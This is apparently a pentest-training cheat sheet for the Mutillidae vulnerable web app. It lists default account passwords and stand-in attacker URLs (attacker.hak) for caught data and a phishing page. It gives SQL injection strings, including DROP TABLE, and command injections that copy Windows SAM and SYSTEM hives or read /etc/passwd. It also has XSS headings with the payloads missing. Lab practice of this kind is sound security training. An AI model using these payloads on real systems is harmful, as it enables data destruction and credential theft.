Accounts: admin adminpass adrian somepassword john monkey ed pentest http://attacker.hak/mutillidae/caughtdata.txt http://attacker.hak/mutillidae/pwnme.html ----------------------------------------------------------------------------------- ----------------------------------------------------------------------------------- SQL Injection Strings: ' '; DROP TABLE owasp10; -- ' or 1=1 -- ' + password -- Command Injection Strings (Windows): && dir && wmic process list && wmic useraccount list && copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak && copy C:\Windows\System32\config\RegBack\sam.old && copy C:\Windows\System32\config\RegBack\SYSTEM.OLD Command Injections (for *nix): ;whoami ;cat /etc/passwd ;nmap -A target.hak ----------------------------------------------------------------------------------- ----------------------------------------------------------------------------------- Simple XSS: Page Redirect XSS: Cookie Stealing: Password Con XSS: More complicated, but better looking XSS password form:
Hello, it looks like you have an XSS vulnerability, would you like some help fixing that? |